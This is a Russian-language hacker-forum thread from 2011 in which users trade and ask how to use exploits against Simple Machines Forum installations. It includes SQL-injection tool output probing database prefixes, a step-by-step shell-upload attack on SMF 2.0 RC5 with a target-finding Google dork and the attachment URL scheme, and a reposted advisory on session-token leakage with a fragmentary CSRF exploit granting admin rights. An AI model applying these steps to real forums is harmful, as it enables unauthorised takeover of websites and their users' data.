 |
|

17.02.2011, 20:52
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от Flisk
Нашел в инете 2 варианта эксплоита под SMF 1.1.11 . Хотелось бы обсудить их.
1.Источник - http://www.thoran.eu/exploit/key/e2f0m/name/Simple_Machines_Forums_SMF_1.1.11.Multiple_Search_ DDOS
2. Источник - http://www.allinfosec.com/2010/06/25/smf-1-1-11-change-password-admin-vulnerabilities/
Хотелось бы узнать такое:
По первому сплоиту - что с ним надо делать? Понимаю, что надо запустить через актив перл, но в самом коде надо что то менять или просто так запускать? Язык перл не знаю.
По второму - окно смены пароля открывается действительно, но когда ввожу новый пароль, пишет "такого пользователя не существует", хотя id=1 точно на форуме есть.
upd. сюда код скопировать почему то не могу - тег CODE переводит все в 1 длинную строку.
1 это походу отправка большого количества запросов, форум их не может фильрировать и падает.... я могу ошибатся
по 2 скажу что этот баг уже профиксили, хотя в сети полно не обновлянных smf
|
|
|

20.04.2011, 01:00
|
|
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
С нами:
9583330
Репутация:
189
|
|
Есть ли возможность узнать имя префикса? какой нибудь ошибкой..
использую SMF
|
|
|

20.04.2011, 18:59
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
А версия бд какая?
|
|
|

20.04.2011, 21:42
|
|
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
С нами:
9583330
Репутация:
189
|
|
Сообщение от Expl0ited
А версия бд какая?
[~] Testing SMF vulnerability... Yes!
[+] SMF vulnerable!
[~] Testing MySQL version... OK!
[+] MySQL => 4.1
[~] Testing prefix 'smf'... Sorry.
[-] Prefix is not correct.
|
|
|

12.07.2011, 16:01
|
|
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
С нами:
8220566
Репутация:
-5
|
|
#SMFRTLO.rb v1.0
#SMF
|
|
|

12.07.2011, 22:50
|
|
Познающий
Регистрация: 23.06.2011
Сообщений: 57
С нами:
7836086
Репутация:
0
|
|
как юзать?
|
|
|

13.07.2011, 12:43
|
|
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
С нами:
8220566
Репутация:
-5
|
|
Сообщение от WTSBugzoff
как юзать?
вот и я зотел узнать как юзать! поэтому выложил, а вообще он для подмены имени своего! и дальнейших махинаций соответственно! может кто разберется и просветит нас
|
|
|

25.07.2011, 12:24
|
|
Новичок
Регистрация: 01.07.2010
Сообщений: 1
С нами:
8350166
Репутация:
0
|
|
SMF 2.0 RC5 Remote Shell Upload Exploit
Автор: KedAns-Dz
E-mail: ked-h@hotmail.com
Twitter page: twitter.com/kedans
Google дорка: "Powered by SMF 2.0 RC5"
Суть в том, что вы можете загрузить Shell в папку attachments
Зайдите в любую тему, ответьте что-нибудь и прикрепите к ответу Shell картинкой, формата *.gif
После этого залитая картинку будет доступна по адресу:
Код:
http://[target/Path]/attachments/{fileID}_{fileHASH}
HASH кодер: SHA1
Далее определяем hash (hashmyfiles поможет):
1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
После того как определили Hash можно пользоваться Shell' ом
Вариант 1:
Код:
http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
Вариант 2:
Код:
http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
Второй вариант не всегда работает
Дополню, что загружаемый gif, должен быть не больше 128 КБ Это стандартное ограничение
P.S.
Сам не проверял, проверил 3 форума, на них закрыто прикрепление файлов.
Локальный лень поставить
Но думаю, что работает
|
|
|

25.07.2011, 22:22
|
|
Новичок
Регистрация: 14.04.2010
Сообщений: 4
С нами:
8461865
Репутация:
0
|
|
Сообщение от ParKrut
SMF 2.0 RC5 Remote Shell Upload Exploit Автор: KedAns-Dz
E-mail: ked-h@hotmail.com
Twitter page: twitter.com/kedans
Google дорка: "Powered by SMF 2.0 RC5"
Суть в том, что вы можете загрузить Shell в папку attachments
Зайдите в любую тему, ответьте что-нибудь и прикрепите к ответу Shell картинкой, формата *.gif
После этого залитая картинку будет доступна по адресу:
Код:
http://[target/Path]/attachments/{fileID}_{fileHASH}
HASH кодер: SHA1
Далее определяем hash (hashmyfiles поможет):
1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
После того как определили Hash можно пользоваться Shell' ом
Вариант 1:
Код:
http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca
Вариант 2:
Код:
http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
Второй вариант не всегда работает
Дополню, что загружаемый gif, должен быть не больше 128 КБ
Это стандартное ограничение
P.S.
Сам не проверял, проверил 3 форума, на них закрыто прикрепление файлов.
Локальный лень поставить
Но думаю, что работает
Как узнать адрес можна поподробнее
|
|
|

08.08.2011, 12:11
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
Simple Machines forum (SMF) 2.0 session hijacking
[CODE]
Simple Machines forum (SMF) 2.0 session hijacking
Found by The X-C3LL and seth
http://0verl0ad.blogspot.com/ || http://xd-blog.com.ar/
2011-08-06
Website: http://www.simplemachines.org/
Greets: yoyahack, eddyw, www.portalhacker.net
SMF stops csrf attacks sending a session token in all the requests wich make changes to the forum.
Usually, it goes in the POST content but when navigating the moderation zone it's present in the url (you need to click the links from inside that zone!). In some places, an attacker can use bbcode to insert a tag, forcing the browser to make a request and leak the token in the referer header.
There are two ways for an attacker to place a image:
-Writing in the moderators chat (?action=moderate), requires being a moderator.
-Making a post and reporting it to the moderator (it will be send to all the section mods and the global mods, who will see it in ?action=moderate;area=reports)
Removing lines 104 and 105 from Subs-Menu.php seems to solve the problem and nothing stops working (!):
/////////////////////////////////////////////////////
if (empty($menuOptions['disable_url_session_check']))
$menu_context['extra_parameters'] .= ';' . $context['session_var'] . '=' . $context['session_id'];
/////////////////////////////////////////////////////
PoC exploit wich gives admin privileges to the regular members:
/////////////////////////////////////////////////////
';
?>
document.forms[0].submit()
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|